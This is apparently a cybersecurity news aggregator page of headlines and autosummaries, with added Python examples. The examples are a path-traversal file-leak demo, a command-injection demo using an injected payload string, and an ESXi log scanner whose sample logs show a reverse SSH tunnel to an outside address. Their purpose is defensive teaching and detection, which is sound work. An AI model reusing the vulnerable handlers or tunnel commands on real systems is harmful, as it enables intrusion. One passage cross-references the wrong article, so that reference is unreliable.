    Autosummary: In this Help Net Security interview, James Mirfin, SVP and Head of Risk and Identity Solutions at Visa, discusses key priorities for leaders combating fraud, the next-generation threats institutions must prepare for, and the role of collaboration between financial sectors and government agencies in countering cybercrime. In fact, Visa regularly works alongside law enforcement, including the US Department of Justice, FBI, Secret Service and Europol, to help identify and apprehend fraudsters and other criminals. "


    Cybersecurity crisis in numbers

    ciber
    2025-01-29 https://www.helpnetsecurity.com/2025/01/29/data-breach-notices/

    The number of US data compromises in 2024 (3,158) decreased 1% compared to 2023 (3,202), 44 events away from tying a record for the number of compromises tracked in a year, according to the Identity Theft Resource Center. Data breach notices surge The number of data breach notices issued in the past year (1,728,519,397) increased 312% from 2023 (419,337,446). The increase was primarily due to six “mega-breaches” that resulted in at least 100 million breach … More

    The post Cybersecurity crisis in numbers appeared first on Help Net Security.

    "

    Autosummary: In 2024, the financial services industry, led by commercial banks and insurance, was the most breached industry, followed by healthcare (the most attacked industry each year from 2018 until 2024), professional services, manufacturing and technology. “With a near-record number of compromises and over 1.7 billion victim notices, often tied to inadequate cyber practices, we are also seeing an increase in notices that provide limited actionable information for victims,” said Eva Velasquez, CEO of the Identity Theft Resource Center. "


    Zyxel CPE Devices Face Active Exploitation Due to Unpatched CVE-2024-40891 Vulnerability

    exploits
    2025-01-29 https://thehackernews.com/2025/01/zyxel-cpe-devices-face-active.html
    Cybersecurity researchers are warning that a critical zero-day vulnerability impacting Zyxel CPE Series devices is seeing active exploitation attempts in the wild. "Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration," GreyNoise researcher Glenn Thorpe said in an alert "

    Autosummary: "Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration," GreyNoise researcher Glenn Thorpe said in an alert published Tuesday. "


    Attackers exploit SimpleHelp RMM Software flaws for initial access

    exploits
    2025-01-29 https://securityaffairs.com/173578/security/attackers-exploit-simplehelp-rmm-software-flaws.html
    Threat actors exploit recently fixed SimpleHelp RMM software vulnerabilities to breach targeted networks, experts warn. Horizon3 researchers discovered three vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, that could be used to compromise a SimpleHelp server, as well as client machines being managed by SimpleHelp. The first vulnerability, CVE-2024-57727 (CVSS score of 7.5), is an unauthenticated […] "

    Autosummary: Horizon3 researchers discovered three vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, that could be used to compromise a SimpleHelp server, as well as client machines being managed by SimpleHelp. "
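The two SimpleHelp items on this page (this one and the earlier Help Net Security piece on healthcare organizations) describe the chain: an unauthenticated download of files from the server hands over configuration files, and the credentials inside them unlock admin access. The snippet below is an added, generic illustration of that first link, arbitrary file download through path traversal, and is not SimpleHelp's code or anything from the Horizon3 write-up. The directory layout, the file names and the "admin.password" value are constructed for the demo.

```python
import os
import tempfile


def resolve_vulnerable(base_dir: str, requested: str) -> str:
    """Vulnerable: trusts the client-supplied name. '..' segments walk out of
    base_dir, and an absolute name makes os.path.join discard base_dir entirely."""
    return os.path.normpath(os.path.join(base_dir, requested))


def resolve_hardened(base_dir: str, requested: str) -> str:
    """Hardened: canonicalise both sides (symlinks included) and refuse any
    target that is not strictly inside base_dir."""
    if os.path.isabs(requested) or "\x00" in requested:
        raise PermissionError(f"rejected download name: {requested!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # commonpath rather than startswith: '/srv/public2/x' must not pass for
    # a base of '/srv/public', and the base directory itself is not a file.
    if target == base or os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes download root: {requested!r}")
    return target


def demo() -> dict:
    """Lay out a throwaway server directory (constructed data) and run the two
    resolvers against the same traversal request."""
    with tempfile.TemporaryDirectory() as root:
        public = os.path.join(root, "public")          # the only directory meant to be served
        os.makedirs(public)
        with open(os.path.join(public, "help.txt"), "w") as fh:
            fh.write("public help text")
        with open(os.path.join(root, "server.cfg"), "w") as fh:   # one level up, never meant to be served
            fh.write("admin.password=hunter2")        # constructed secret
        traversal = "../server.cfg"
        with open(resolve_vulnerable(public, traversal)) as fh:
            leaked = fh.read()                        # the config file, credentials and all
        try:
            resolve_hardened(public, traversal)
            blocked = False
        except PermissionError:
            blocked = True
        with open(resolve_hardened(public, "help.txt")) as fh:
            legit = fh.read()                         # a legitimate request still works
    return {"leaked": leaked, "blocked": blocked, "legit": legit}


if __name__ == "__main__":
    print(demo())
```

The check is done on the canonical path after symlink resolution, which is what defeats both `..` sequences and symlinks planted inside the served directory; filtering the string for `..` is not equivalent.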


    AI in Cybersecurity: What's Effective and What’s Not – Insights from 200 Experts

    ciber
    2025-01-29 https://thehackernews.com/2025/01/ai-in-cybersecurity-whats-effective-and.html
    Curious about the buzz around AI in cybersecurity? Wonder if it's just a shiny new toy in the tech world or a serious game changer? Let's unpack this together in a not-to-be-missed webinar that goes beyond the hype to explore the real impact of AI on cybersecurity. Join Ravid Circus, a seasoned pro in cybersecurity and AI, as we peel back the layers of AI in cybersecurity through a revealing "

    Autosummary: Join Ravid Circus, a seasoned pro in cybersecurity and AI, as we peel back the layers of AI in cybersecurity through a revealing survey of 200 industry insiders. "


    New SLAP & FLOP Attacks Expose Apple M-Series Chips to Speculative Execution Exploits

    exploits
    2025-01-29 https://thehackernews.com/2025/01/new-slap-flop-attacks-expose-apple-m.html
    A team of security researchers from Georgia Institute of Technology and Ruhr University Bochum has demonstrated two new side-channel attacks targeting Apple silicon that could be exploited to leak sensitive information from web browsers like Safari and Google Chrome. The attacks have been codenamed Data Speculation Attacks via Load Address Prediction on Apple Silicon (SLAP) and Breaking the "

    Autosummary: FLOP causes "critical checks in program logic for memory safety to be bypassed, opening attack surfaces for leaking secrets stored in memory," the researchers noted, adding it could be weaponized against both Safari and Chrome browsers to pull off various arbitrary memory read primitives, such as recovering location history, calendar events, and credit card information. "


    How Interlock Ransomware Infects Healthcare Organizations

    exploits ransomware
    2025-01-29 https://thehackernews.com/2025/01/how-interlock-ransomware-infects.html
    Ransomware attacks have reached an unprecedented scale in the healthcare sector, exposing vulnerabilities that put millions at risk. Recently, UnitedHealth revealed that 190 million Americans had their personal and healthcare data stolen during the Change Healthcare ransomware attack, a figure that nearly doubles the previously disclosed total.  This breach shows just how deeply ransomware "

    Autosummary: Data sent by the RAT to attacker-controlled servers is revealed by ANY.RUN. Proactive protection against ransomware in healthcare: the healthcare sector is a prime target for ransomware groups like Interlock, with attacks that jeopardize sensitive patient data, disrupt critical services, and put lives at risk. This tactic effectively bypasses the initial layer of user suspicion, but with early detection and analysis, SOC teams can quickly identify malicious domains, block access, and respond faster to emerging threats, reducing the potential impact on business operations. Inside ANY.RUN's sandbox session, one of the updaters, upd_8816295.exe, is clearly identified within the process tree on the right-hand side, showing its malicious behavior and execution flow. "


    Attackers actively exploit a critical zero-day in Zyxel CPE Series devices

    exploits
    2025-01-29 https://securityaffairs.com/173589/hacking/zyxel-cpe-series-devices-cve-2024-40891-exploited.html
    Experts warn that threat actors are actively exploiting a critical zero-day vulnerability, tracked as CVE-2024-40891, in Zyxel CPE Series devices. GreyNoise researchers are observing active exploitation attempts targeting the flaw. The vulnerability is a command injection issue that remains unpatched and has not yet been publicly disclosed. Attackers can exploit […] "

    Autosummary: "


    Threat predictions for industrial enterprises 2025

    industry
    2025-01-29 https://ics-cert.kaspersky.com/publications/threat-predictions-for-industrial-enterprises-2025/
    Kaspersky ICS CERT analyzes industrial threat trends and makes forecasts on how the industrial threat landscape will look in 2025. "

    Autosummary: Therefore, many countries are looking for their way into the new technological order, investing in promising research and development in a variety of areas: AI and machine learning, quantum computing, optical electronics, new materials, energy sources and types of engines, satellites and telecommunications, genetics, biotechnology and medicine. The security of smart sensors, meters, measuring and control devices, and other devices in the Industrial Internet of Things is typically neglected by both the enterprises using them and, correspondingly, the developers themselves. For some reason, this problem is largely ignored by security researchers as well: while the security of endpoints and their key components, such as modems, is thoroughly studied, there are extremely few in-depth publications on the security of base stations or core network equipment. Moreover, the installation, initial setup, and regular maintenance of equipment requires the involvement of various third-party specialists, further expanding the attack surface of the supply chain and trusted partners. Both the AI systems and the unique enterprise data they use (either in its raw form – historical telemetry data – used as a training dataset, or as neural network weights incorporated into the AI model), if they become crucial assets, may now be new cyberattack targets. "


    Hackers exploit critical unpatched flaw in Zyxel CPE devices

    exploits
    2025-01-29 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-unpatched-flaw-in-zyxel-cpe-devices/
    Hackers are exploiting a critical command injection vulnerability in Zyxel CPE Series devices that is currently tracked as CVE-2024-40891 and remains unpatched since last July. [...] "

    Autosummary: “Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration” - GreyNoise. Internet scanning service Censys reports that there are more than 1,500 Zyxel CPE Series devices currently exposed online, mostly in the Philippines, Turkey, the United Kingdom, France, and Italy. "


    Windows 11 KB5050094 update fixes bugs causing audio issues

    exploits
    2025-01-29 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5050094-update-fixes-bugs-causing-audio-issues/
    Microsoft has released the optional KB5050094 Preview cumulative update for Windows 11 24H2 with 28 bug fixes and changes, including fixes for bugs causing audio playback issues on systems with USB audio device drivers. [...] "

    Autosummary: The January 2025 non-security preview update comes with additional fixes and improvements, some of the more significant ones listed below: [USB cameras] Fixed: Your device does not recognize the camera is on. "


    Zyxel CPE devices under attack via critical vulnerability without a patch (CVE-2024-40891)

    exploits
    2025-01-29 https://www.helpnetsecurity.com/2025/01/29/zyxel-cpe-devices-under-attack-vulnerability-cve-2024-40891/

    CVE-2024-40891, a command injection vulnerability in Zyxel CPE Series telecommunications devices that has yet to be fixed by the manufacturer, is being targeted by attackers, cybersecurity company Greynoise has warned. Successful exploitation would allow attackers to execute arbitrary commands on affected devices, potentially leading to complete system compromise, network infiltration, and data exfiltration. “After identifying a significant overlap between IPs exploiting CVE-2024-40891 and those classified as Mirai, the team investigated a recent variant of Mirai … More

    The post Zyxel CPE devices under attack via critical vulnerability without a patch (CVE-2024-40891) appeared first on Help Net Security.

    "

    Autosummary: Preventing exploitation: Censys.io, a web platform for identifying internet-connected assets, currently shows some 1,500 vulnerable devices, mostly in the Philippines, Turkey, and Europe. "
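The four CVE-2024-40891 items on this page (the GreyNoise alert and the Security Affairs, BleepingComputer and Help Net Security write-ups) describe the flaw only as a command injection in Zyxel CPE devices, with no patch and some 1,500 devices exposed. The example below is added here and is not Zyxel firmware or code from any of those reports: a generic CPE-style "diagnostic" handler in Python, in its vulnerable form, with shell quoting as a partial fix, and in a hardened form that allowlist-validates the target and never hands the string to a shell. `echo` stands in for the ping binary so the snippet runs offline, and the payload string is constructed.

```python
import re
import shlex
import subprocess

# Allowlist for a diagnostic target: a dotted IPv4 address or a DNS hostname.
# Whitespace, ';', '|', '$', backticks and newlines can never match, so they
# are rejected before any process is spawned.
TARGET_RE = re.compile(
    r"^(?:(?:\d{1,3}\.){3}\d{1,3}"
    r"|[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)$"
)


def is_valid_target(target: str) -> bool:
    """True only for a host name or IPv4 literal of sane length."""
    return len(target) <= 253 and TARGET_RE.match(target) is not None


def diag_vulnerable(target: str) -> str:
    """Vulnerable pattern: the request parameter is pasted into a shell command
    line. 'echo' stands in for the ping/traceroute binary a real diagnostic
    page would call; with shell=True the shell parses the attacker's text."""
    cmd = f"echo pinging {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def diag_quoted(target: str) -> str:
    """Partial fix: shlex.quote makes the shell treat the parameter as one word.
    This stops the injection but still routes attacker-controlled text through
    a shell, so it is the fallback, not the fix."""
    cmd = f"echo pinging {shlex.quote(target)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def diag_hardened(target: str) -> str:
    """Hardened: reject anything outside the allowlist, then pass an argv list
    so no shell ever interprets the value."""
    if not is_valid_target(target):
        raise ValueError(f"rejected diagnostic target: {target!r}")
    return subprocess.run(["echo", "pinging", target], capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "192.0.2.1; echo INJECTED"   # constructed attacker input
    print("vulnerable:", repr(diag_vulnerable(payload)))   # second command runs
    print("quoted:    ", repr(diag_quoted(payload)))       # whole string is one argument
    try:
        diag_hardened(payload)
    except ValueError as err:
        print("hardened:  ", err)
```

The hardened handler rejects rather than sanitizes: stripping `;` alone leaves `$(...)`, backticks, `|` and newlines, so an allowlist of what a target may look like is the only robust rule. Until a fix ships for the affected devices, the practical mitigation is the one the exposure numbers point at: the management interface should not be reachable from the WAN at all.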


    Swimlane Vulnerability Response Management offers risk-based prioritization

    exploits
    2025-01-29 https://www.helpnetsecurity.com/2025/01/29/swimlane-vulnerability-response-management/

    Swimlane announced Vulnerability Response Management (VRM) Solution that extends beyond siloed vulnerability management by offering risk-based prioritization, exploit intelligence and recommended remediation workflows. Swimlane AI automation solutions combine the power of AI with human expertise, enabling faster, more accurate decision-making and empowering security teams to act confidently. VRM is designed to help enterprise and MSSP security teams proactively reduce risk, prevent breaches and ensure continuous compliance. With an overwhelming volume to manage, 68% of organizations … More

    The post Swimlane Vulnerability Response Management offers risk-based prioritization appeared first on Help Net Security.

    "

    Autosummary: Customers will benefit from standout capabilities, including: Swimlane Intelligence: VRM picks up where vulnerability scanners stop, using AI and automation to enrich findings with Swimlane Intelligence, such as known exploits, temporal Common Vulnerability Scoring System (CVSS) scores, remediation information, with over 30 out-of-the-box enrichment and customizable sources. "


    DeepSeek’s popularity exploited by malware peddlers, scammers

    financial exploits
    2025-01-29 https://www.helpnetsecurity.com/2025/01/29/deepseek-popularity-exploited-malware-scams/

    As US-based AI companies struggle with the news that the recently released Chinese-made open source DeepSeek-R1 reasoning model performs as well as theirs for a fraction of the cost, users are rushing to try out DeepSeek’s AI tool. In the process, they have pushed it to the top of the list of most popular iOS and Android apps. DeepSeek name abused for scams and malware delivery The company has reportedly been dealing with outages and … More

    The post DeepSeek’s popularity exploited by malware peddlers, scammers appeared first on Help Net Security.

    "

    Autosummary: We should expect DeepSeek to be misused by criminals to create materials used in phishing and BEC campaigns (e.g., emails in different languages, without typos, replicating the tone and writing style of the impersonated sender), set up fraudulent sites mimicking legitimate publishers or fake, fraudulent online stores, inundate legitimate stores with AI-generated product reviews, and so on. "


    Critical remote code execution bug found in Cacti framework

    exploits
    2025-01-29 https://securityaffairs.com/173597/security/critical-rce-cacti-framework.html
    A critical flaw in the Cacti open-source network monitoring and fault management framework could allow remote code execution. Cacti is an open-source platform that provides a robust and extensible operational monitoring and fault management framework for users. A critical vulnerability, tracked as CVE-2025-22604 (CVSS score of 9.1), in the Cacti open-source framework could allow an authenticated […] "

    Autosummary: "


    U.S. CISA adds Apple products’ flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-01-29 https://securityaffairs.com/173622/hacking/us-cisa-adds-apple-products-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple products’ flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple Multiple Products Use-After-Free Vulnerability, tracked as CVE-2025-24085, to its Known Exploited Vulnerabilities (KEV) catalog. This week, Apple released security updates to address 2025’s first zero-day vulnerability, tracked as CVE-2025-24085, actively exploited […] "

    Autosummary: The vulnerability impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "


    Migrants veer from US and stay in Mexico to "make a life"

    latam
    2025-01-29 https://www.bbc.com/news/videos/c983njx883no
    Migrants from Cuba and Venezuela have chosen to seek asylum in Mexico after Trump blocked an app that processes immigration claims. "

    Autosummary: "


    Cybersecurity jobs available right now: January 28, 2025

    ciber
    2025-01-28 https://www.helpnetsecurity.com/2025/01/28/cybersecurity-jobs-available-right-now-january-28-2025/

    Application Security Engineer Bumble | United Kingdom | Hybrid – View job details As an Application Security Engineer, you will design and implement security testing tools within CI/CD pipelines to detect vulnerabilities early without impacting development speed. Conduct risk assessments and threat modelling exercises to identify potential vulnerabilities and prioritise security measures based on impact. Identify and prioritise vulnerabilities, driving remediation efforts and offering mitigation strategies to engineering teams. CISO Global-e | Israel | On-site … More

    The post Cybersecurity jobs available right now: January 28, 2025 appeared first on Help Net Security.

    "

    Autosummary: Cyber Defense, Monitoring & Incident Management Mizuho | USA | Hybrid – View job details As a Cyber Defense, Monitoring & Incident Management, you will oversee tools, technologies, and processes related to security operations, including vulnerability management, data loss prevention, EDR/NDR/XDR. Define cyber security governance and control strategies for emerging technologies such as cloud & containerization, block-chain, etc. Cloud Advisory (IAM) Architect Slalom | Canada | On-site – View job details As a Cloud Advisory (IAM) Architect, you will lead the design and implementation of IAM architectures, including client and workforce identity solutions, integrating zero trust principles to secure users, devices, and applications. Senior Security Advisor – Cyber Supply Chain Risk Management Intact | Canada | Hybrid – View job details As a Senior Security Advisor – Cyber Supply Chain Risk Management, you will develop, implement, and enhance programs that monitor, measure, analyze and report on third-party risk exposures across all business areas and compare against the organization’s risk appetite. Incident Response Lead Trimble | Germany | Remote – View job details As an Incident Response Lead, you will lead the incident management process for the family of events, including platform/product incidents, cyberattacks, data protection, or information security hazards. Head of Cyber Defense Center CMA CGM | France | On-site – View job details As a Head of Cyber Defense Center, you will build and maintain an efficiently functional and collaborative CDC model with the appropriate interfaces, processes and workflows between SOC, incident response, vulnerability management, and threat intelligence functions. "


    Apple Patches Actively Exploited Zero-Day Affecting iPhones, Macs, and More

    exploits
    2025-01-28 https://thehackernews.com/2025/01/apple-patches-actively-exploited-zero.html
    Apple has released software updates to address several security flaws across its portfolio, including a zero-day vulnerability that it said has been exploited in the wild. The vulnerability, tracked as CVE-2025-24085, has been described as a use-after-free bug in the Core Media component that could permit a malicious application already installed on a device to elevate privileges. "Apple is "

    Autosummary: "


    Top-Rated Chinese AI App DeepSeek Limits Registrations Amid Cyberattacks

    ciber
    2025-01-28 https://thehackernews.com/2025/01/top-rated-chinese-ai-app-deepseek.html
    DeepSeek, the Chinese AI startup that has captured much of the artificial intelligence (AI) buzz in recent days, said it's restricting registrations on the service, citing malicious attacks. "Due to large-scale malicious attacks on DeepSeek's services, we are temporarily limiting registrations to ensure continued service," the company said in an incident report page. "Existing users can log in "

    Autosummary: "During the pre-training stage, training DeepSeek-V3 on each trillion tokens requires only 180K H800 GPU hours, i.e., 3.7 days on our cluster with 2048 H800 GPUs," the company said in a study. "


    Chinese AI platform DeepSeek faced a “large-scale” cyberattack

    ciber
    2025-01-28 https://securityaffairs.com/173546/security/chinese-ai-platform-deepseek-faced-a-large-scale-cyberattack.html
    Chinese AI company DeepSeek has disabled registrations for its DeepSeek-V3 chat platform following a “large-scale” cyberattack. DeepSeek has designed a new AI platform that quickly gained attention over the past week primarily due to its significant advancements in artificial intelligence and its impactful applications across various industries.  DeepSeek’s AI model is highly appreciated due to […] "

    Autosummary: (Pierluigi Paganini, January 28, 2025) Chinese AI company DeepSeek has disabled registrations for its DeepSeek-V3 chat platform following a “large-scale” cyberattack. "


    China's DeepSeek AI shakes industry and dents America's swagger

    industry
    2025-01-28 https://www.bbc.com/news/articles/cd643wx888qo
    The app spooked the markets as well as the bullish sense of American superiority in AI development. "

    Autosummary: While ChatGPT-maker OpenAI has been haemorrhaging money - spending $5bn last year alone - DeepSeek's developers say it built this latest model for a mere $5.6m. That is a tiny fraction of the cost that AI giants like OpenAI, Google, and Anthropic have relied on to develop their own models. "


    ForensicScope Regula 4125 detects counterfeit documents

    industry
    2025-01-28 https://www.helpnetsecurity.com/2025/01/28/forensicscope-regula-4125/

    Regula has launched the portable and autonomous ForensicScope Regula 4125. The new device enables ID verification in any place and environment: at border and inland checkpoints, at airports, in transport, etc. Although the Regula 4125 is only smartphone-sized, it is capable of performing a wide range of document checks typical for professional forensic equipment. The new Regula 4125 is particularly effective at detecting morphing in photos in identity documents. Face morphing is an insidious threat … More

    The post ForensicScope Regula 4125 detects counterfeit documents appeared first on Help Net Security.

    "

    Autosummary: The device is equipped with three cameras: the main one, an infrared (IR) one for full-page visualization, and a special camera for detecting face morphing. "


    Apple zero-day vulnerability exploited to target iPhone users (CVE-2025-24085)

    exploits
    2025-01-28 https://www.helpnetsecurity.com/2025/01/28/apple-zero-day-vulnerability-exploited-to-target-iphone-cve-2025-24085/

    Apple has shipped a fix for a zero-day vulnerability (CVE-2025-24085) that is being leveraged by attackers against iPhone users. About CVE-2025-24085 CVE-2025-24085 is a use after free bug in CoreMedia, a framework used by Apple devices for the processing of media data. The vulnerability can be triggered by a malicious application and may allow attackers to elevate privileges on targeted devices. “Apple is aware of a report that this issue may have been actively exploited … More

    The post Apple zero-day vulnerability exploited to target iPhone users (CVE-2025-24085) appeared first on Help Net Security.

    "

    Autosummary: "


    Ransomware Targets ESXi Systems via Stealthy SSH Tunnels for C2 Operations

    exploits
    2025-01-28 https://thehackernews.com/2025/01/ransomware-targets-esxi-systems-via.html
    Cybersecurity researchers have found that ransomware attacks targeting ESXi systems are also leveraging the access to repurpose the appliances as a conduit to tunnel traffic to command-and-control (C2) infrastructure and stay under the radar. "ESXi appliances, which are unmonitored, are increasingly exploited as a persistence mechanism and gateway to access corporate networks widely," Sygnia "

    Autosummary: To detect attacks that involve the use of SSH tunneling on ESXi appliances, organizations have been recommended to review the following four log files: /var/log/shell.log (ESXi shell activity log), /var/log/hostd.log (host agent log), /var/log/auth.log (authentication log) and /var/log/vobd.log (VMware observer daemon log). "
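The detection advice above names four log files but not what to look for in them. What follows is an added example, not code from the Sygnia report or the article: a small Python scanner run over constructed sample lines (hypothetical timestamps, RFC 5737 documentation addresses) in the format of those four files. It flags ssh client invocations typed in the ESXi shell that carry tunnelling flags (-R, -L, -D, including combined short options such as -fNR), interactive sshd logins in auth.log, and the "SSH access has been enabled" events hostd and vobd record when the service is switched on.

```python
import re
import shlex
from collections import namedtuple

# Constructed sample lines (not real logs) in the format of the four ESXi log
# files named in the article. Addresses are from RFC 5737 documentation ranges.
SAMPLE_LOGS = {
    "/var/log/shell.log": [
        "2025-01-27T02:14:09Z shell[2101]: [root]: esxcli system version get",
        "2025-01-27T02:15:41Z shell[2101]: [root]: ssh -f -N -R 0.0.0.0:31337:127.0.0.1:22 ops@203.0.113.5",
        "2025-01-27T02:16:02Z shell[2101]: [root]: ssh -D 1080 -o StrictHostKeyChecking=no ops@203.0.113.5",
        "2025-01-27T02:20:15Z shell[2101]: [root]: vim-cmd vmsvc/getallvms",
    ],
    "/var/log/auth.log": [
        "2025-01-27T02:13:58Z sshd[2098]: Accepted password for root from 198.51.100.23 port 51722 ssh2",
        "2025-01-27T02:13:58Z sshd[2098]: pam_unix(sshd:session): session opened for user root",
    ],
    "/var/log/hostd.log": [
        "2025-01-27T02:13:40.112Z info hostd[2097] [Originator@6876 sub=Vimsvc] SSH access has been enabled.",
    ],
    "/var/log/vobd.log": [
        "2025-01-27T02:13:40.115Z: [UserLevelCorrelator] [esx.audit.ssh.enabled] SSH access has been enabled.",
    ],
}

Finding = namedtuple("Finding", "file severity reason line")

# ssh client flags that turn the host into a tunnel endpoint.
FORWARD_FLAGS = {"R": "remote port forward", "L": "local port forward", "D": "dynamic SOCKS proxy"}
# Other short options that take an argument: once one is seen, the rest of the
# token is its value, so "-oLogLevel=DEBUG" is not misread as -L or -D.
ARG_LETTERS = set("BbcEeFIiJlmOopQSWw")
SSH_CMD = re.compile(r"(?:^|\s)ssh\s+(.*)$")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port")


def ssh_tunnel_flags(command: str) -> set:
    """Return the tunnelling flags (R, L, D) present in an ssh client invocation."""
    m = SSH_CMD.search(command)
    if not m:
        return set()
    try:
        tokens = shlex.split(m.group(1))
    except ValueError:            # unbalanced quotes in the captured command line
        return set()
    flags = set()
    for tok in tokens:
        if not tok.startswith("-") or tok.startswith("--"):
            continue
        for ch in tok[1:]:        # walk combined short options such as -fNR
            if ch in FORWARD_FLAGS:
                flags.add(ch)
                break             # remainder of the token is the forward spec
            if ch in ARG_LETTERS:
                break             # remainder of the token is that option's value
    return flags


def scan_logs(logs: dict) -> list:
    """Run the three checks over the four files and return Findings for review."""
    findings = []
    for path, lines in logs.items():
        for line in lines:
            if path.endswith("shell.log"):
                flags = ssh_tunnel_flags(line)
                if flags:
                    what = ", ".join(f"-{f} {FORWARD_FLAGS[f]}" for f in sorted(flags))
                    findings.append(Finding(path, "high", f"ssh tunnel started from ESXi shell ({what})", line))
            elif path.endswith("auth.log"):
                m = ACCEPTED.search(line)
                if m:
                    findings.append(Finding(path, "medium", f"SSH login as {m.group(2)} from {m.group(3)} ({m.group(1)})", line))
            elif "SSH access has been enabled" in line:
                findings.append(Finding(path, "medium", "SSH service switched on", line))
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"[{f.severity}] {f.file}: {f.reason}\n    {f.line}")
```

On a real appliance the same three checks run over the files themselves (the shell.log format is what ESXi writes for each command typed in the ESXi Shell); the sample only fixes the format so the checks can be exercised offline. An ESXi host that was never meant to have SSH on at all makes the hostd/vobd "enabled" event alone worth an alert.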


    E.U. Sanctions 3 Russian Nationals for Cyber Attacks Targeting Estonia’s Key Ministries

    rusia-ucrania
    2025-01-28 https://thehackernews.com/2025/01/eu-sanctions-3-russian-nationals-for.html
    The Council of the European Union has sanctioned three individuals for allegedly carrying out "malicious cyber activities" against Estonia. The three Russian nationals – Nikolay Alexandrovich Korchagin, Vitaly Shevchenko, and Yuriy Fedorovich Denisov – are officers of the General Staff of the Armed Forces of the Russian Federation (GRU) Unit 29155, it said. Per the council decision, all the "

    Autosummary: "


    PowerSchool starts notifying victims of massive data breach

    financial
    2025-01-28 https://www.bleepingcomputer.com/news/security/powerschool-starts-notifying-victims-of-massive-data-breach/
    Education software giant PowerSchool has started notifying individuals in the U.S. and Canada whose personal data was exposed in a late December 2024 cyberattack. [...] "

    Autosummary: The PowerSchool cyberattack PowerSchool is a cloud-based K-12 software provider serving over 60 million students and 18,000 customers worldwide, offering enrollment, communication, attendance, staff management, learning, analytics, and finance solutions. "


    Microsoft tests Edge Scareware Blocker to block tech support scams

    financial
    2025-01-28 https://www.bleepingcomputer.com/news/microsoft/microsoft-tests-edge-scareware-blocker-to-block-tech-support-scams/
    Microsoft has started testing a new "scareware blocker" feature for the Edge web browser on Windows PCs, which uses machine learning (ML) to detect tech support scams. [...] "

    Autosummary: [Figure: Scareware blocker settings (Microsoft)] When the scareware blocker spots a potentially malicious page, Edge gives control back to the user, exiting full-screen mode, halting loud audio, displaying a warning, and showing a thumbnail of the page. "


    Apple users: Update your devices now to patch zero-day vulnerability

    exploits
    2025-01-28 https://www.malwarebytes.com/blog/news/2025/01/apple-users-update-your-devices-now-to-patch-zero-day-vulnerability
    Apple has released a host of security updates for iOS, iPadOS, Mac, Apple Watch, and Apple TV. Update as soon as you can. "

    Autosummary: Devices affected are those that run: iPhone XS and later; iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later; macOS Sequoia; Apple Watch Series 6 and later; all models of Apple TV HD and Apple TV 4K. If you use any of these then you should install updates as soon as you can. "


    The AI Fix #35: Project Stargate, the AI emergency, and batsh*t AI cryonics

    industry
    2025-01-28 https://grahamcluley.com/the-ai-fix-35/
    In episode 35 of The AI Fix, our hosts learn who the 175th best programmer in the world is, the AI supervillains put on suits for President Trump, a "not imaginary" AI turns out to be imaginary, OpenAI releases Operator and teases o3-mini, and Anthropic predicts that superintelligence is only three years away. Graham considers giving his money, pets, and vital organs to a YouTuber with an AI, and Mark looks into Project Stargate and the geo-politics of AI. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley. "

    Autosummary: "


    Ransomware attack on ENGlobal compromised personal information

    exploits
    2025-01-28 https://securityaffairs.com/173566/cyber-crime/englobal-disclosed-a-ransomware-attack.html
    ENGlobal reported to the SEC that personal information was compromised in a ransomware attack that took place in November 2024. In the SEC filing, the company confirmed that threat actors gained access to personal information. On November 25, ENGlobal experienced a ransomware attack and took certain systems offline […] "

    Autosummary: "


    Colombian air force planes fetch deportees from US

    latam
    2025-01-28 https://www.bbc.com/news/articles/cgly1we7gx4o
    The planes' arrival paves the way for the US to lift visa restrictions imposed after a spat with Colombia. "

    Autosummary: "They are Colombians, free and dignified, and in their homeland where they are loved," he wrote on X. He also posted photos of the migrants getting off the plane without handcuffs. "


    Google Maps will rename Gulf of Mexico to Gulf of America in US

    latam
    2025-01-28 https://www.bbc.com/news/articles/c8634nwxd46o
    It is the firm's "longstanding practice" to observe updates from official sources - in this case requested by Donald Trump. "

    Autosummary: "America will reclaim its rightful place as the greatest, most powerful, most respected nation on Earth, inspiring the awe and admiration of the entire world," Trump said at the time. "


    PureCrypter Deploys Agent Tesla and New TorNet Backdoor in Ongoing Cyberattacks

    ciber
    2025-01-28 https://thehackernews.com/2025/01/purecrypter-deploys-agent-tesla-and-new.html
    A financially motivated threat actor has been linked to a phishing email campaign, ongoing since at least July 2024, that specifically targets users in Poland and Germany. The attacks have led to the deployment of various payloads, such as Agent Tesla, Snake Keylogger, and a previously undocumented backdoor dubbed TorNet that's delivered by means of PureCrypter. TorNet is so "

